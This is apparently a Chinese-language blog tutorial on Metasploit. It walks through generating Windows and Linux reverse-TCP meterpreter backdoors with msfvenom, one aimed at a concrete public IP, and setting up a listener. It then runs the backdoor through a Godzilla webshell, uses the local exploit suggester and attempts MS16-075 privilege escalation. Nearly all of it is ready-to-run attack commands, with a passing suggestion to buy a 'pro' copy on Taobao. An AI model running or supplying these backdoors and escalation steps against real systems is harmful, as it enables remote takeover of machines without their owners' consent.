MSF工具使用

1. 0、MSF安装(也可以用 kaLi)

目前的msf版本有bug可以TB上购买pro版本嘎嘎稳
https://blog.csdn.net/qq_46717339/article/details/122653084

curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && chmod 755 msfinstall && ./msfinstall

启动msf:

msfconsole

2. 1、生成反弹后门

msfvenom -p windows/meterpreter/reverse_tcp LHOST=【msf主机地址】 LPORT=4444 -f exe -o msf.exe


msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=124.71.111.64 LPORT=1122 -f elf -o msf

上传msf.exe

3. 2、配置监听会话

  • msfconsle 启动msf
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp //payload与上面生成后门的模块保持一致
set lhost 0.0.0.0
set lport 3333

这里设置0.0.0.0就是监听本地所有的网卡
监听端口3333 记得放行安全组

  • run

  • 哥斯拉执行msf.exe

  • 收到信息

  • 可以看到此时还是这个权限

3.1. 筛选EXP模块

全自动:快速识别系统中可能被利用的漏洞

background //返回
use post/multi/recon/local_exploit_suggester
set showdescription true //设置为显示说明
  • backgroud 然后执行命令

  • show options

可以看到这里seesion为空,我们要设置session

  • sessions查看

  • set seesion 设置session

  • run 检测是否有利用的漏洞
    检测完后,就会显示可能存在的漏洞

4. 3、利用EXP溢出提权

background
use exploit/windows/local/ms16_075_reflection_juicy
set session 1
exploit
  • use 【漏洞】 使用漏洞。名字就是上面显示的

  • show options 查看session

  • set session 1再设置一下session

  • run 攻击session指定的目标

  • 这里我不知道什么原因,提权失败了。如果成功就会多出一个session

可以看到getuid 返回是system